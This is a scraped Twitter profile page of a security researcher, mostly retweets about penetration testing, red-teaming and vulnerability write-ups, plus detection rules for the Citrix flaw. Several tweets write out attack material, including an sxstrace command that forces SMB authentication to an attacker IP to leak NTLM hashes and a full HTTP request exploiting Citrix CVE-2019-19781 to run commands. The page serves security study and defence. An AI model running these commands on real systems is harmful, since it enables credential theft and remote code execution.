Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @coreb1t
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @coreb1t
-
Prikvačeni tweet
Here are slides of my talk "Tales of Practical Android Penetration Testing"
@OWASPRomania where I've presented Mobile-Pentest-Toolkit (MPT) https://www.owasp.org/images/4/4b/OWASP-Tales-of-practical-penetration-testing.pdf … Thanks everyone for attending, I hope you enjoyed it.#OWASP#AppSec#MobileSecurity#MobilePentestToolkitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
Load encrypted PE from XML Attribute. MSBuild is still the best.
https://github.com/XwingAngel/PELoader/ …
MSBuild sets Property then calls Execute.
Use this example to decouple payloads & prove that all security products have a "Single File Bias".
Decouple payloads to subvert detection.pic.twitter.com/648rujlLQn
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
A new way to exfiltrate
#NTLM hash by forcing#SMB auth ? Check this#Microsoft#lolbin: sxstrace parse -logfile:\\192.168.XX.XX\lol.etl -outfile:a.txt || sxstrace trace -logfile:\\192.168.xx.xx\a cc@OddvarmoeHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
Post-exploitation
#Friday tip: Do you know how to trivially & remotely hijack an#RDP session without prompt nor warning on user's side using#Microsoft signed binary (no patch/multi-session) ? qwinsta+mstsc shadowing is the answer ;) Details: https://github.com/kmkz/Pentesting/blob/master/Post-Exploitation-Cheat-Sheet …#Pentestingpic.twitter.com/wHVIYQo73A
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
Revisiting RDP lateral movement https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3 … and releasing a project that will be part of a bigger tool coming next week
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
If you have AppLocker deployed, be aware that most times when Windows 10 is updated/upgraded, it creates a TASKS_MIGRATED folder under C:\windows\system32 that has the CREATOR OWNER, meaning that users can create and execute files from the folder and bypassing AppLocker
pic.twitter.com/YLUxRxDyxr
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Alexander Subbotin proslijedio/la je Tweet
That epic Microsoft moment

#cve20200601#curveball Recently worked on#mimikatz and ECC, so yes, 10 and 2016/2019 only. Previous versions like Windows 7 did not support personnal EC curves (only few NIST standard ones)pic.twitter.com/EayEuFVv1JPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
I'm excited to share my post about discovering & exploiting multiple critical vulnerabilities in Cisco's DCNM. Busting Cisco's Beans :: Hardcoding Your Way to Hell https://srcincite.io/blog/2020/01/14/busting-ciscos-beans-hardcoding-your-way-to-hell.html … PoC exploit code: https://srcincite.io/pocs/cve-2019-15975.py.txt … https://srcincite.io/pocs/cve-2019-15976.py.txt … https://srcincite.io/pocs/cve-2019-15977.py.txt …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+http://template.new ({'BLOCK'='print+`id`'})%]
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
#Citrix#Netscaler#Shitrix
Snort
https://doc.emergingthreats.net/bin/view/Main/2029206 …
Sigma
https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml …
YARA
https://github.com/Neo23x0/signature-base/blob/master/yara/exploit_shitrix.yar …
IOCs
https://otx.alienvault.com/pulse/5e1c293e07c770f36d232489 …
Nmap NSE
https://github.com/cyberstruggle/DeltaGroup/blob/master/CVE-2019-19781/CVE-2019-19781.nse …
MSF
https://github.com/rapid7/metasploit-framework/blob/a64b0fa9e75befc3ffdb6129e88a6f6dd4c31208/modules/exploits/unix/webapp/citrix_dir_trasversal_rce.rb …
HoneyPot
https://github.com/MalwareTech/CitrixHoneypot …
SSH checkhttps://twitter.com/cyb3rops/status/1216310642552049666 …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
Ppl interested to learn about SSRF attacks
1. https://medium.com/bugbountywriteup/server-side-request-forgery-ssrf-testing-b9dfe57cca35 …
2. https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/ …
3. https://hackerone.com/reports/115748
4. https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html …
5. https://geleta.eu/2019/my-first-ssrf-using-dns-rebinfing/ …
6. https://medium.com/@androgaming1912/gain-adfly-smtp-access-with-ssrf-via-gopher-protocol-26a26d0ec2cb …
7. https://medium.com/@w_hat_boy/server-side-request-forgery-ssrf-port-issue-hidden-approch-f4e67bd8cc86 …
8. https://medium.com/@armaanpathan/pdfreacter-ssrf-to-root-level-local-file-read-which-led-to-rce-eb460ffb3129 …
WriteupsHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
Antivirus Evasion with Python - really good read!
#infosec#pentest#redteamhttps://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
Awesome research by
@0x09AL looking at CVE-2019-19781 Citrix ADC RCE. Purposely not provided the fire and forget exploit (although this is well known now). Technical details provided for those looking at just how this issue manifests itself. https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
lsassy 1.0.0 is finally out !
Remotely dump #lsass **with built-in Windows tools only**, procdump is no longer necessary
Remotely parse lsass dumps to extract credentials
Link to #Bloodhound to detect compromised users with path to Domain Admin https://github.com/Hackndo/lsassy pic.twitter.com/vljW7swZGr
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
Recovering a SIM card's PIN via APDU sniffing on a cellular home phone stationhttp://ripitapart.com/2019/12/21/recovering-the-sim-card-pin-from-the-zte-wf721-cellular-home-phone/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
Writeup on how I made $40,000 breaking the new Chromium Edge using essentially two XSS flaws.https://leucosite.com/Edge-Chromium-EoP-RCE/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
New writeup, one of my favorite bugs
-
Filling in the Blanks: Exploiting Null Byte Buffer Overflow for a $40,000 Bounty
https://samcurry.net/filling-in-the-blanks-exploiting-null-byte-buffer-overflow-for-a-40000-bounty/ …
Featuring...
@d0nutptr@0xacb@Regala_@JLLiS@Yassineaboukir@plmaltaispic.twitter.com/RomLgdCcSC
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
Bypass SSL Pinning and intercept HTTPS with Burp with apk-mitm - A CLI application that automatically prepares Android APK files for HTTPS inspectionhttp://github.com/shroudedcode/apk-mitm …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
From dropbox(updater) to NT AUTHORITY\SYSTEM http://decoder.cloud/2019/12/18/from-dropboxupdater-to-nt-authoritysystem/ …pic.twitter.com/oE18Y62hn3
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Alexander Subbotin proslijedio/la je Tweet
(1/2) This was a big week in the
#BloodHound community:@SadProcessor released a great post about BloodHound for Blue Teamers: https://twitter.com/SadProcessor/status/1185235913070333952 …@PyroTek3 reminded us how to best prevent BloodHound data collection:https://twitter.com/PyroTek3/status/1184935580246904834 …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.